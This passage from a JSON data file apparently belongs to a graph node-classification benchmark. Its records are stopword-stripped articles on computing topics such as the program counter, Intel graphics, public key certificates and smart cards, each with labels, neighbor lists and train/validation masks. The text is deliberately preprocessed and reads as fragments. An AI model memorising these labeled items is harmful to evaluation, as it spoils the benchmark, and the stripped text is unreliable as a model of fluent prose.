    "text": "Program_counter:program counter program counter pc commonly called instruction pointer ip intel x86 itanium microprocessors sometimes called instruction address register iar instruction counter part instruction sequencer processor register indicates computer program sequence processors pc incremented fetching instruction holds memory address points next instruction would executed processor incrementation precedes fetch pc points current instruction executed processors usually fetch instructions sequentially memory control transfer instructions change sequence placing new value pc include branches sometimes called jumps subroutine calls returns transfer conditional truth assertion lets computer follow different sequence different conditions branch provides next instruction fetched elsewhere memory subroutine call branches saves preceding contents pc somewhere return retrieves saved contents pc places back pc resuming sequential execution instruction following subroutine call typical central processing unit cpu pc digital counter origin term program counter may one many registers cpu hardware instruction cycle begins fetch cpu places value pc address bus send memory memory responds sending contents memory location data bus stored-program computer model executable instructions stored alongside ordinary data memory handled identically following fetch cpu proceeds execution taking action based memory contents obtained point cycle pc modified next instruction executed different one typically incremented next instruction one starting memory address immediately following last memory location current instruction like processor registers pc may bank binary latches one representing one bit value pc number bits width pc relates processor architecture instance “ 32-bit ” cpu may use 32 bits able address 2 units memory pc binary counter may increment pulse applied count input cpu may compute value load pc pulse load input identify current instruction pc may combined registers identify segment page approach permits pc fewer bits assuming memory units interest within current vicinity use pc normally increments assumes computer execute usually linear sequence instructions pc central von neumann architecture thus programmers write sequential control flow even algorithms sequential resulting “ von neumann bottleneck ” led research parallel computing including non-von neumann dataflow models use pc example rather specifying sequential steps high-level programmer might specify desired function low-level programmer might specify using combinatory logic research also led ways making conventional pc-based cpus run faster including modern high-level programming languages still follow sequential-execution model indeed common way identifying programming errors “ procedure execution ” programmer finger identifies point execution pc would high-level language essentially machine language virtual machine complex built hardware instead emulated interpreted software however new programming models transcend sequential-execution programming",
    "neighbors": [
      7173,
      6153,
      2066,
      7699,
      5655,
      10779,
      8732,
      10781,
      6181,
      7717,
      8231,
      10796,
      3630,
      6705,
      7218,
      2619,
      2623,
      2113,
      7234,
      3142,
      585,
      74,
      2638,
      10835,
      3157,
      9302,
      602,
      1122,
      3175,
      8815,
      5744,
      7281,
      5234,
      9331,
      630,
      8822,
      6268,
      3197,
      7313,
      663,
      1175,
      5783,
      6815,
      8352,
      5793,
      6818,
      10403,
      8868,
      6821,
      7852,
      9391,
      2224,
      2226,
      7858,
      9911,
      8890,
      4286,
      2241,
      2243,
      9932,
      5329,
      10966,
      731,
      11487,
      5862,
      7911,
      10985,
      5354,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      10485,
      249,
      3323,
      8700,
      7421,
      11003,
      1798,
      1801,
      9996,
      10508,
      6926,
      6415,
      1298,
      11539,
      7445,
      2339,
      5412,
      6950,
      9003,
      3886,
      1841,
      10746,
      10548,
      309,
      8501,
      5948,
      4928,
      4417,
      8514,
      4423,
      4424,
      8523,
      5452,
      6476,
      5457,
      7505,
      9044,
      11604,
      344,
      9563,
      8543,
      1376,
      10603,
      4465,
      372,
      10612,
      1399,
      7033,
      1402,
      1915,
      8060,
      9599,
      3457,
      398,
      3470,
      5518,
      8078,
      5523,
      407,
      409,
      10658,
      3493,
      9126,
      426,
      10669,
      1967,
      2480,
      5040,
      10675,
      1461,
      1463,
      7607,
      4030,
      3010,
      6596,
      453,
      3014,
      9668,
      4553,
      5065,
      9169,
      466,
      1499,
      477,
      1502,
      7134,
      5090,
      995,
      2019,
      7653,
      9707,
      10734,
      6639,
      7151,
      9714,
      499,
      4596,
      3066,
      508
    ],
    "mask": "None"
  },
  {
    "node_id": 9740,
    "label": 2,
    "text": "Bring_your_own_operating_system:bring operating system bring operating system byoos relates practice providing pc computers usually without internally installed disks users bring operating system commonly usb pen drives use supplied hardware operating system choice byoos made possible thanks ability create usb pen drives external storage devices 'live operating system images containing necessary drivers allow boot operation compatible computer bootable versions linux available 1993 2012 microsoft windows 8 enterprise edition followed introduced 'windows go functionality allow operating system boot run mass storage devices usb flash drives thus enabling byoos windows family operating system similar linux live cd/dvd allowing users bring operating system significant cost savings made organisations commonly many on-site users obliged provide computer hardware allow perform specific tasks longer need install hard drive computer upgrading maintaining many pc computers also become easier companies need supply users new pen drives containing operating system boot images rather re-image every pc latest build operating system thus eliminating upgrade costs users take usb devices containing version operating system around employees boot home computer usb stick exactly software environment use place work thus enabling employees work home exactly would office introduction cloud based storage means portable operating systems free need store data locally unbundling office application data user data drives containing operating systems key factor making byoos possible",
    "neighbors": [
      1150,
      823
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9741,
    "label": 3,
    "text": "Intel_Graphics_Technology:intel graphics technology intel graphics technology gt collective name series integrated graphics processors igps produced intel manufactured package die central processing unit cpu first introduced 2010 intel hd graphics intel iris graphics intel iris pro graphics igp series introduced 2013 models haswell processors high-performance versions hd graphics iris pro graphics first series incorporate embedded dram fourth quarter 2013 intel integrated graphics represented units 65 pc graphics processor shipments however percentage represent actual adoption number shipped units end systems outfitted discrete graphics cards introduction intel hd graphics intel integrated graphics built motherboard northbridge part intel hub architecture known intel extreme graphics intel gma part platform controller hub pch design northbridge eliminated graphics processing moved die central processing unit cpu previous intel integrated graphics solution intel gma reputation lacking performance features therefore considered good choice demanding graphics applications 3d gaming performance increases brought intel hd graphics made products competitive integrated graphics adapters made rivals nvidia ati/amd intel hd graphics featuring minimal power consumption important laptops capable enough pc manufacturers often stopped offering discrete graphics options low-end high-end laptop lines reduced dimensions low power consumption important intel hd iris graphics divided generations within generation divided 'tiers increasing performance denominated 'gtx label january 2010 clarkdale arrandale processors ironlake graphics released branded celeron pentium core hd graphics one specification 12 execution units 43.2 gflops 900 mhz decode h264 1080p video 40 fps direct predecessor gma_x4500 featured 10 eus 800 mhz lacked capabilities january 2011 sandy bridge processors released introducing second generation hd graphics sandy bridge celeron pentium intel hd core i3 either hd 2000 hd 3000 hd graphics 2000 3000 include hardware video encoding hd postprocessing effects 24 april 2012 ivy bridge released introducing third generation intel hd graphics ivy bridge celeron pentium intel hd core i3 either hd 2500 hd 4000 hd graphics 2500 4000 include hardware video encoding hd postprocessing effects low-power mobile cpus limited video decoding support none desktop cpus limitation 12 september 2012 haswell cpus announced four models integrated gpus 128 mb edram iris pro gt3e package cpu separate die manufactured different process intel refers level 4 cache available cpu gpu naming crystalwell linux support edram expected kernel version 3.12 making codice_1 driver aware capable using integrated iris pro graphics adopted apple late-2013 15-inch macbook pro laptops retina display first time history series discrete graphics cards although low-end model also included late-2013 21.5-inch imac november 2013 announced broadwell-k desktop processors aimed enthusiasts also carry iris pro graphics following models integrated gpu announced broadwell processors skylake line processors launched august 2015 retires vga support supporting multi-monitor setups three monitors connected via hdmi 1.4 displayport 1.2 embedded displayport edp 1.3 interfaces following models integrated gpu available announced skylake processors new features speed increases support 4k uhd premium drm encoded streaming services media engine full hardware acceleration 8- 10-bit hevc vp9 decode new features hdcp 2.2 support new features hdmi 2.0 support vp9 10-bit profile2 hardware decoder new features 10 nm gen 11 gpu microarchitecture two hevc 10-bit encode pipelines three 4k display pipelines 2x 5k60 1x 4k120 variable rate shading vrs beginning sandy bridge graphics processors include form digital copy protection digital rights management drm called intel insider allows decryption protected media within processor previously similar technology called protected audio video path pavp intel quick sync video intel hardware video encoding decoding technology integrated intel cpus name quick sync refers use case quickly transcoding syncing video example dvd blu-ray disc format appropriate example smartphone quick sync introduced gen 6 sandy bridge microprocessors 9 january 2011 graphics virtualization technology announced supported iris pro gpus hd 2500 hd 4000 gpus ivy bridge cpus advertised supporting three active monitors many users found work due chipsets supporting two active monitors many common configurations reason chipsets include two phase-locked loops plls pll generates pixel clock certain frequency used sync timings data transferred gpu displays therefore three simultaneously active monitors achieved hardware configuration requires two unique pixel clocks asrock z87- h87-based motherboards support three displays simultaneously asus h87-based motherboards also advertised support three independent monitors opencl 2.1 2.2 possible software update opencl 2.0 hardware broadwell+ future software updates mesa support direct3d 9.3 implemented gallium3d-style drivers mesa intel driver intel developed dedicated sip core implements multiple video decompression compression algorithms branded intel quick sync video implemented completely partially intel releases programming manuals intel hd graphics devices via open source technology center allows various open source enthusiasts hackers contribute driver development port drivers various operating systems without need reverse engineering",
    "neighbors": [
      3459,
      5380,
      3973,
      11524,
      9095,
      5386,
      9611,
      4108,
      398,
      5649,
      5523,
      6804,
      8851,
      2838,
      4886,
      3352,
      9111,
      2594,
      6818,
      10658,
      9126,
      10669,
      9391,
      10548,
      1461,
      1083,
      2237,
      5309,
      7998,
      10173,
      8514,
      6339,
      5444,
      1614,
      1998,
      2638,
      5073,
      11221,
      344,
      10971,
      1119,
      6495,
      9057,
      11487,
      8035,
      1000,
      7657,
      1387,
      4204,
      4332,
      5356,
      5871,
      1776,
      8684,
      499,
      8820,
      3317,
      4217,
      5883,
      508,
      5503
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9742,
    "label": 3,
    "text": "AlphaServer:alphaserver alphaserver name given series server computers produced 1994 onwards digital equipment corporation later compaq hp name suggests alphaservers based dec alpha 64-bit microprocessor supported operating systems alphaservers tru64 unix formerly digital unix openvms meditech magic windows nt earlier systems alphabios arc firmware enthusiasts provided alternative operating systems linux netbsd openbsd freebsd alphaserver models rebadged white enclosures digital servers windows nt server market so-called white box models comprised following part roadmap phase alpha- mips- pa-risc-based systems favor itanium-based systems hp recent alphaserver systems reached end general availability 27 april 2007 availability upgrades options discontinued 25 april 2008 approximately one year systems discontinued support recent alphaserver systems ds15a ds25 es45 es47 es80 gs1280 provided hp services 2008 systems scheduled reach end support sometime 2012 although hp stated event may delayed approximate chronological order following alphaserver models produced alphaserver 2100 briefly sold digital 2100 alphaserver brand introduced alphaserver sc supercomputer constructed set individual ds20l es40 es45 servers called nodes mounted racks every node connected every node using quadrics elan3 interconnect systems designed used primarily high-performance technical computing alphaserver sc45 supercomputer still ranked 6 world late november 2004 alphaserver gs1280 originally supported maximum 16 microprocessors october 2003 number microprocessors supported increased 64 supported memory capacity doubled 8 gb per microprocessor",
    "neighbors": [
      5384,
      9353,
      8976,
      2452,
      408,
      8474,
      8732,
      6942,
      799,
      6451,
      823,
      7234,
      3142,
      8390,
      1480,
      6352,
      11604,
      3945,
      10220,
      8944,
      5873,
      499,
      3445,
      10104,
      9723
    ],
    "mask": "None"
  },
  {
    "node_id": 9743,
    "label": 2,
    "text": "Walnut_Creek_CDROM:walnut creek cdrom walnut creek cdrom walnut creek california early provider freeware shareware free software cd-roms company founded august 1991 bob bruce one first commercial distributors free software cd-roms company produced hundreds titles cd-roms ran busiest ftp site internet ftp.cdrom.com many years early years popular products simtel shareware ms-dos cica shareware microsoft windows sunny archives aminet archives amiga january 1994 published collection 350 texts project gutenberg one first published ebook collections walnut creek developed close relationship freebsd unix-like open source operating system project inception 1993 company published freebsd cd-rom distributed ftp employed freebsd project founders jordan hubbard david greenman ran freebsd servers sponsored freebsd conferences published freebsd books including complete freebsd 1997 freebsd walnut creek successful product according bruce 1995 onwards walnut creek also official publisher slackware linux walnut creek also gained fame codice_1 subdirectory de facto distribution center doom -engine modification community time users gained access high-speed internet connections demand software physical media decreased dramatically company merged berkeley software design inc. bsdi 2000 focus engineering effort similar freebsd bsd/os operating systems soon bsdi acquired telenet system solutions inc. internet infrastructure server supplier software assets bsdi freebsd slackware bsd/os acquired wind river systems 2001 remainder company renamed ixsystems wind river dropped sponsorship slackware soon afterwards freebsd unit divested separate entity 2002 freebsd mall inc. ixsystems server business acquired 2002 offmyserver reverted ixsystems name 2005 february 2007 ixsystems acquired freebsd mall walnut creek cdrom url time redirected simtel.net page found simtel shut march 15 2013",
    "neighbors": [
      7552,
      5506,
      1927,
      4745,
      10761,
      2061,
      6797,
      657,
      5397,
      8725,
      5534,
      1316,
      10149,
      684,
      4908,
      1839,
      7983,
      1718,
      1080,
      9151,
      9153,
      3522,
      3651,
      7364,
      7748,
      10436,
      9927,
      8395,
      9166,
      850,
      6361,
      9306,
      10202,
      3551,
      607,
      9320,
      873,
      9452,
      633,
      8316
    ],
    "mask": "Train"
  },
  {
    "node_id": 9744,
    "label": 4,
    "text": "Public_key_certificate:public key certificate cryptography public key certificate also known digital certificate identity certificate electronic document used prove ownership public key certificate includes information key information identity owner called subject digital signature entity verified certificate contents called issuer signature valid software examining certificate trusts issuer use key communicate securely certificate subject email encryption code signing e-signature systems certificate subject typically person organization however transport layer security tls certificate subject typically computer device though tls certificates may identify organizations individuals addition core role identifying devices tls sometimes called older name secure sockets layer ssl notable part https protocol securely browsing web typical public-key infrastructure pki scheme certificate issuer certificate authority ca usually company charges customers issue certificates contrast web trust scheme individuals sign keys directly format performs similar function public key certificate common format public key certificates defined x.509 x.509 general format constrained profiles defined certain use cases public key infrastructure x.509 defined nowiki rfc 5280 /nowiki tls updated replacement ssl server required present certificate part initial connection setup client connecting server perform certification path validation algorithm primary hostname domain name website listed common name subject field certificate certificate may valid multiple hostnames multiple websites certificates commonly called subject alternative name san certificates unified communications certificates ucc certificates contain field subject alternative name though many cas also put subject common name field backward compatibility hostnames contain asterisk certificate may also called wildcard certificate tls server may configured self-signed certificate case clients generally unable verify certificate terminate connection unless certificate checking disabled per applications ssl certificates classified three types- client certificates less common server certificates used authenticate client connecting tls service instance provide access control services provide access individuals rather devices client certificates contain email address personal name rather hostname also authentication usually managed service provider client certificates usually issued public ca provides server certificates instead operator service requires client certificates usually operate internal ca issue client certificates supported many web browsers services use passwords cookies authenticate users instead client certificates client certificates common rpc systems used authenticate devices ensure authorized devices make certain rpc calls s/mime protocol secure email senders need discover public key use given recipient get information email certificate publicly trusted certificate authorities provide email certificates commonly s/mime used communicating within given organization organization runs ca trusted participants email system certificates also used validate signatures programs ensure tampered delivery certificate identifying individual typically electronic signature purposes commonly used europe eidas regulation standardizes requires recognition self-signed certificate used sign certificates also sometimes called trust anchor certificate used sign certificates intermediate certificate must signed another intermediate certificate root certificate certificate used sign certificates instance tls/ssl server client certificates email certificates code signing certificates qualified certificates end-entity certificates certificate subject matches issuer signature verified public key types certificate self-signed self-signed certificates also often called snake oil certificates emphasize untrustworthiness common fields certificates certificates contain number fields listed note terms certificate x.509 representation certificate flat contains fields nested various structures within certificate european union electronic signatures legal documents commonly performed using digital signatures accompanying identity certificates largely signatures granted enforceability handwritten signatures eidas eu regulation x.509 trust model certificate authority ca responsible signing certificates certificates act introduction two parties means ca acts trusted third party ca processes requests people organizations requesting certificates called subscribers verifies information potentially signs end-entity certificate based information perform role effectively ca needs one broadly trusted root certificates intermediate certificates corresponding private keys cas may achieve broad trust root certificates included popular software obtaining cross-signature another ca delegating trust cas trusted within relatively small community like business distributed mechanisms like windows group policy certificate authorities also responsible maintaining up-to-date revocation information certificates issued indicating whether certificates still valid provide information online certificate status protocol ocsp and/or certificate revocation lists crls major software contains list certificate authorities trusted default makes easier end-users validate certificates easier people organizations request certificates know certificate authorities issue certificate broadly trusted particularly important https web site operator generally wants get certificate trusted nearly potential visitors web site policies processes provider uses decide certificate authorities software trust called root programs influential root programs browsers firefox generally use operating system facilities decide certificate authorities trusted instance chrome windows trusts certificate authorities included microsoft root program macos ios chrome trusts certificate authorities apple root program edge safari use respective operating system trust stores well available single os firefox uses mozilla root program trust store platforms mozilla root program operated publicly certificate list part open source firefox web browser broadly used outside firefox instance common linux root program many linux distributions like debian include package periodically copies contents firefox trust list used applications root programs generally provide set valid purposes certificates include instance cas may considered trusted issuing tls server certificates code signing certificates indicated set trust bits root certificate storage system common use certificates https-based web sites web browser validates https web server authentic user feel secure his/her interaction web site eavesdroppers web site claims security important electronic commerce practice web site operator obtains certificate applying certificate authority certificate signing request certificate request electronic document contains web site name company information public key certificate provider signs request thus producing public certificate web browsing public certificate served web browser connects web site proves web browser provider believes issued certificate owner web site example user connects codice_1 browser browser give certificate warning message user theoretically sure interacting codice_1 equivalent interacting entity contact email address listed public registrar example.com even though email address may displayed anywhere web site surety kind implied relationship purchaser certificate operator web site generator web site content may tenuous guaranteed best certificate guarantees uniqueness web site provided web site compromised hacked certificate issuing process subverted certificate provider opt issue three types certificates requiring degree vetting rigor order increasing rigor naturally cost domain validation organization validation extended validation rigors loosely agreed upon voluntary participants ca/browser forum certificate provider issue domain validation dv class certificate purchaser purchaser demonstrate one vetting criterion right administratively manage domain name certificate provider issue organization validation ov class certificate purchaser purchaser meet two criteria right administratively manage domain name question perhaps organization actual existence legal entity certificate provider publishes ov vetting criteria certificate policy acquire extended validation ev certificate purchaser must persuade certificate provider legal identity including manual verification checks human ov certificates certificate provider publishes ev vetting criteria certificate policy browsers generally offer users visual indication legal identity site presents ev certificate browsers show legal name domain use bright green color highlight change way user see legal identity owner verified web browser give warning user web site suddenly presents different certificate even certificate lower number key bits even different provider even previous certificate expiry date far future however change ev certificate non-ev certificate apparent green bar longer displayed certificate providers jurisdiction governments governments may freedom order provider generate certificate purposes law enforcement subsidiary wholesale certificate providers also freedom generate certificate web browsers come extensive built-in list trusted root certificates many controlled organizations may unfamiliar user organizations free issue certificate web site guarantee web browsers include root certificates accept genuine instance end users must rely developer browser software manage built-in list certificates certificate providers behave correctly inform browser developer problematic certificates uncommon incidents fraudulent certificates issued cases browsers detected fraud others time passed browser developers removed certificates software list built-in certificates also limited provided browser developer users degree applications free extend list special purposes company intranets means someone gains access machine install new root certificate browser browser recognize websites use inserted certificate legitimate provable security reliance something external system consequence public key certification scheme rely special setup assumption existence certificate authority spite limitations described certificate-authenticated tls considered mandatory security guidelines whenever web site hosts confidential information performs material transactions practice spite weaknesses described web sites secured public key certificates still secure unsecured http // web sites national institute standards technology nist computer security division provides guidance documents public key certificates",
    "neighbors": [
      513,
      7683,
      517,
      9744,
      9745,
      5666,
      2083,
      2090,
      9271,
      7736,
      3643,
      10300,
      62,
      7231,
      9281,
      3657,
      1098,
      10831,
      5200,
      11345,
      8283,
      7264,
      1125,
      10341,
      106,
      115,
      119,
      2169,
      3707,
      10882,
      5764,
      1157,
      138,
      9356,
      1683,
      1688,
      11418,
      9884,
      3742,
      3231,
      160,
      8358,
      2222,
      10417,
      9394,
      2228,
      4797,
      9412,
      713,
      5834,
      3805,
      736,
      225,
      9441,
      6904,
      4863,
      3843,
      1288,
      1297,
      8468,
      11046,
      11048,
      6954,
      7985,
      11569,
      5433,
      11584,
      8018,
      11660,
      8080,
      1946,
      6560,
      929,
      7075,
      11175,
      9640,
      11693,
      8627,
      3521,
      7106,
      6088,
      2003,
      5590,
      1496,
      474,
      4063,
      1504,
      8674,
      7139,
      5107,
      501,
      1526,
      503,
      510
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9745,
    "label": 4,
    "text": "Smart_card:smart card smart card chip card integrated circuit card icc physical electronic authorization device used control access resource typically plastic credit card sized card embedded integrated circuit many smart cards include pattern metal contacts electrically connect internal chip others contactless smart cards provide personal identification authentication data storage application processing applications include identification financial mobile phones sim public transit computer security schools healthcare smart cards may provide strong security authentication single sign-on sso within organizations several nations deployed smart cards throughout populations 1968 1969 helmut gröttrup jürgen dethloff filled several patents around identification card 1974 roland moreno patented secured memory card later dubbed smart card 1976 jürgen dethloff introduced known element called secret identify gate user usp 4105156 1977 michel ugon honeywell bull invented first microprocessor smart card two chips one microprocessor one memory 1978 patented self-programmable one-chip microcomputer spom defines necessary architecture program chip three years later motorola used patent cp8 time bull 1,200 patents related smart cards 2001 bull sold cp8 division together patents schlumberger subsequently combined internal smart card department cp8 create axalto 2006 axalto gemplus time world top two smart-card manufacturers merged became gemalto 2008 dexa systems spun schlumberger acquired enterprise security services business included smart-card solutions division responsible deploying first large-scale smart-card management systems based public key infrastructure pki first mass use cards telephone card payment french payphones starting 1983 télécarte microchips integrated french carte bleue debit cards 1992 customers inserted card merchant point-of-sale pos terminal typed personal identification number pin transaction accepted limited transactions paying small highway tolls processed without pin smart-card-based electronic purse systems store funds card readers need network connectivity entered european service mid-1990s common germany geldkarte austria quick wertkarte belgium proton france moneo netherlands chipknip chipper decommissioned 2001 switzerland cash norway mondex spain monedero 4b sweden cash decommissioned 2004 finland avant uk mondex denmark danmønt portugal porta-moedas multibanco private electronic purse systems also deployed marines corps usmc parris island allowing small amount payments cafeteria since 1990s smart cards subscriber identity modules sims used gsm mobile-phone equipment mobile phones widely used across world smart cards become common europay mastercard visa emv -compliant cards equipment widespread deployment led european countries united states started later deploying emv technology 2014 deployment still progress 2018 typically country national payment association coordination mastercard international visa international american express japan credit bureau jcb jointly plan implement emv systems historically 1993 several international payment companies agreed develop smart-card specifications debit credit cards original brands mastercard visa europay first version emv system released 1994 1998 specifications became stable emvco maintains specifications emvco purpose assure various financial institutions retailers specifications retain backward compatibility 1998 version emvco upgraded specifications 2000 2004 emv compliant cards first accepted malaysia 2005 later united states 2014 mastercard first company allowed use technology united states united states felt pushed use technology increase identity theft credit card information stolen target late 2013 one largest indicators american credit card information safe target made decision april 30 2014 would try implement smart chip technology order protect future credit card identity theft 2014 consensus america enough security measures avoid credit card theft smart chip necessary cost smart chip technology significant corporations want pay united states debate came online credit theft insecure enough united states invest technology adaptation emv increased significantly 2015 liability shifts occurred october credit card companies contactless smart cards require physical contact card reader becoming popular payment ticketing typical uses include mass transit motorway tolls visa mastercard implemented version deployed 2004–2006 u.s. visa current offering called visa contactless contactless fare collection systems incompatible though mifare standard card nxp semiconductors considerable market share us europe use contactless smart cards transport also grown use low cost chips nxp mifare ultralight paper/card/pet rather pvc reduced media cost used low cost tickets short term transport passes 1 year typically cost typically 10 pvc smart card larger memory distributed vending machines ticket offices agents use paper/pet less harmful environment traditional pvc cards greenpeace confidex see also transport/transit/id applications smart cards also introduced identification entitlement regional national international organizations uses include citizen cards drivers ’ licenses patient cards malaysia compulsory national id mykad enables eight applications 18 million users contactless smart cards part icao biometric passports enhance security international travel smart card may following generic characteristics since april 2009 japanese company manufactured reusable financial smart cards made paper contact smart cards contact area approximately comprising several gold-plated contact pads pads provide electrical connectivity inserted reader used communications medium smart card host e.g. computer point sale terminal mobile telephone cards contain batteries power supplied card reader iso/iec 7810 iso/iec 7816 series standards define chips financial cards used subscriber identity modules sims mobile phones programmed differently embedded different piece pvc chip manufacturers building demanding gsm/3g standards example although emv standard allows chip card draw 50 terminal cards normally well telephone industry 6 limit allows smaller cheaper financial card terminals communication protocols contact smart cards include t=0 character-level transmission protocol defined iso/iec 7816-3 t=1 block-level transmission protocol defined iso/iec 7816-3 contactless smart cards communicate powered reader rf induction technology data rates 106–848 kbit/s cards require proximity antenna communicate like smart cards contacts contactless cards internal power source instead use inductor capture incident radio-frequency interrogation signal rectify use power card electronics contactless smart media made pvc paper/card pet finish meet different performance cost durability requirements apdu transmission contactless interface defined iso/iec 14443-4 hybrid cards implement contactless contact interfaces single card dedicated modules/storage processing dual-interface cards implement contactless contact interfaces single card shared storage processing example porto multi-application transport card called andante uses chip contact contactless iso/iec 14443 type b interfaces ccid chip card interface device usb protocol allows smart card connected computer using standard usb interface allows smart card used security token authentication data encryption bitlocker typical ccid usb dongle may contain sim smart cards serve credit atm cards fuel cards mobile phone sims authorization cards pay television household utility pre-payment cards high-security identification access badges public transport public phone payment cards smart cards may also used electronic wallets smart card chip loaded funds pay parking meters vending machines merchants cryptographic protocols protect exchange money smart card machine connection bank needed holder card may use even owner examples proton geldkarte chipknip moneo german geldkarte also used validate customer age vending machines cigarettes best known payment cards classic plastic card roll-outs started 2005 u.s. asia europe followed 2006 contactless non-pin transactions cover payment range 5–50 iso/iec 14443 paypass implementation paypass implementations conform emv non-emv cards work like magnetic stripe cards common u.s. paypass magstripe visa msd cards hold maintain account balance payment passes without pin usually off-line mode security transaction greater magnetic stripe card transaction emv cards either contact contactless interfaces work normal emv card contact interface via contactless interface work somewhat differently card commands enabled improved features lower power shorter transaction times subscriber identity modules used mobile-phone systems reduced-size smart cards using otherwise identical technologies smart-cards authenticate identity sometimes employ public key infrastructure pki card stores encrypted digital certificate issued pki provider along relevant information examples include u.s. department defense dod common access card cac cards used governments citizens include biometric identification data cards provide superior two- three-factor authentication smart cards always privacy-enhancing subject may carry incriminating information card contactless smart cards read within wallet even garment simplify authentication however criminals may access data cards cryptographic smart cards often used single sign-on advanced smart cards include specialized cryptographic hardware uses algorithms rsa digital signature algorithm dsa today cryptographic smart cards generate key pairs board avoid risk one copy key since design usually n't way extract private keys smart card smart cards mainly used digital signatures secure identification common way access cryptographic smart card functions computer use vendor-provided pkcs 11 library microsoft windows cryptographic service provider csp api also supported widely used cryptographic algorithms smart cards excluding gsm so-called crypto algorithm triple des rsa key set usually loaded des generated rsa card personalization stage smart cards also made support national institute standards technology nist standard personal identity verification fips 201 turkey implemented first smart card driver license system 1987 turkey high level road accidents decided develop use digital tachograph devices heavy vehicles instead existing mechanical ones reduce speed violations since 1987 professional driver licenses turkey issued smart cards professional driver required insert driver license digital tachograph starting drive tachograph unit records speed violations driver gives printed report driving hours driver also monitored reported 1990 european union conducted feasibility study bevac consulting engineers titled feasibility study respect european electronic drivers license based smart-card behalf directorate general vii study chapter seven describes turkey experience argentina mendoza province began using smart card driver licenses 1995 mendoza also high level road accidents driving offenses poor record recovering fines smart licenses hold up-to-date records driving offenses unpaid fines also store personal information license type number photograph emergency medical information blood type allergies biometrics fingerprints stored chip card holder wishes argentina government anticipates system help collect 10 million per year fines 1999 gujarat first indian state introduce smart card license system 2005 issued 5 million smart card driving licenses people 2002 estonian government started issue smart cards named id kaart primary identification citizens replace usual passport domestic eu use 2010 1 million smart cards issued total population 1.3 million widely used internet banking buying public transport tickets authorization various websites etc start 2009 entire population belgium issued eid cards used identification cards contain two certificates one authentication one signature signature legally enforceable services belgium use eid authorization spain started issuing national id cards dni form smart cards 2006 gradually replaced older ones smart cards idea many bureaucratic acts could done online failure administration adapt still mostly requires paper documents personal presence august 14 2012 id cards pakistan replaced smart card third generation chip-based identity document produced according international standards requirements card 36 physical security features latest encryption codes smart card replaced nicop id card overseas pakistani smart cards may identify emergency responders skills cards like allow first responders bypass organizational paperwork focus time emergency resolution 2004 smart card alliance expressed needs enhance security increase government efficiency reduce identity fraud protect personal privacy establishing mandatory government-wide standard secure reliable forms identification emergency response personnel carry cards positively identified emergency situations widepoint corporation smart card provider fema produces cards contain additional personal information medical records skill sets 2007 open mobile alliance oma proposed new standard defining v1.0 smart card web server scws http server embedded sim card intended smartphone user non-profit trade association simalliance promoting development adoption scws simalliance states scws offers end-users familiar os-independent browser-based interface secure personal sim data mid-2010 simalliance reported widespread industry acceptance scws. ref name= http //www.simalliance.org/en t=/documentmanager/sfdoc.file.supply fileid=1279268442341 /ref oma maintaining standard approving v1.1 standard may 2009 v1.2 expected approved october 2012 smart cards also used identify user accounts arcade machines smart cards used transit passes integrated ticketing used many public transit operators card users may also make small purchases using cards operators offer points usage exchanged retailers benefits examples include singapore cepas ontario presto card hong kong octopus card london oyster card ireland leap card brussels mobib québec opus card san francisco clipper card auckland hop brisbane go card perth smartrider sydney opal card victoria myki however present privacy risk allow mass transit operator government track individual movement finland example data protection ombudsman prohibited transport operator helsinki metropolitan area council ytv collecting information despite ytv argument card owner right list trips paid card earlier information used investigation myyrmanni bombing uk department transport mandated smart cards administer travel entitlements elderly disabled residents schemes let residents use cards bus passes also used taxi concessionary transport one example smartcare go scheme provided ecebs uk systems use itso ltd specification schemes uk include period travel passes carnets tickets day passes stored value used pay journeys concessions school pupils students job seekers also supported mostly based itso ltd specification many smart transport schemes include use low cost smart tickets simple journeys day passes visitor passes examples include glasgow spt subway smart tickets made paper pet thinner pvc smart card e.g confidex smart media smart tickets supplied pre-printed over-printed printed demand smart cards used security token mozilla firefox web browser use smart cards store certificates use secure web browsing disk encryption systems veracrypt microsoft bitlocker use smart cards securely hold encryption keys also add another layer encryption critical parts secured disk gnupg well known encryption suite also supports storing keys smart card smart cards also used single sign-on log computers smart cards provided students schools colleges uses include smart health cards improve security privacy patient information provide secure carrier portable medical records reduce health care fraud support new processes portable medical records provide secure access emergency medical information enable compliance government initiatives e.g. organ donation mandates provide platform implement applications needed health care organization smart cards widely used encrypt digital television streams videoguard specific example smart card security worked malaysian government promotes mykad single system smart-card applications mykad started identity cards carried citizens resident non-citizens available applications include identity travel documents drivers license health information electronic wallet atm bank-card public toll-road transit payments public key encryption infrastructure personal information inside mykad card read using special apdu commands smart cards advertised suitable personal identification tasks engineered tamper resistant chip usually implements cryptographic algorithm however several methods recovering algorithm internal state differential power analysis involves measuring precise time electric current required certain encryption decryption operations deduce on-chip private key used public key algorithms rsa implementations symmetric ciphers vulnerable timing power attacks well smart cards physically disassembled using acid abrasives solvents technique obtain unrestricted access on-board microprocessor although techniques may involve risk permanent damage chip permit much detailed information e.g. photomicrographs encryption hardware extracted benefits smart cards directly related volume information applications programmed use card single contact/contactless smart card programmed multiple banking credentials medical entitlement driver license/public transport entitlement loyalty programs club memberships name multi-factor proximity authentication embedded smart cards increase security services card example smart card programmed allow contactless transaction also within range another device like uniquely paired mobile phone significantly increase security smart card governments regional authorities save money improved security better data reduced processing costs savings help reduce public budgets enhance public services many examples uk many using common open lasseo specification individuals better security convenience using smart cards perform multiple services example need replace one card wallet lost stolen data storage card reduce duplication even provide emergency medical information first main advantage smart cards flexibility smart cards multiple functions simultaneously id credit card stored-value cash card repository personal information telephone numbers medical history card easily replaced lost requirement pin form security provides additional security unauthorised access information others first attempt use illegally card would deactivated card reader second main advantage security smart cards electronic key rings giving bearer ability access information physical places without need online connections encryption devices user encrypt decrypt information without relying unknown therefore potentially untrustworthy appliances atms smart cards flexible providing authentication different level bearer counterpart finally information user smart cards provide parties useful devices customizing products services general benefits smart cards smart cards used electronic commerce internet though business model used current electronic commerce applications still use full potential electronic medium advantage smart cards electronic commerce use customize services example order service supplier deliver customized service user may need provide supplier profile boring time-consuming activity smart card contain non-encrypted profile bearer user get customized services even without previous contacts supplier plastic paper card chip embedded fairly flexible larger chip higher probability normal use could damage cards often carried wallets pockets harsh environment chip antenna contactless cards pvc cards crack break bent/flexed excessively however large banking systems failure-management costs offset fraud reduction production use disposal pvc plastic known harmful environment plastics alternative materials including chlorine free plastics paper available smart applications account holder computer hosts 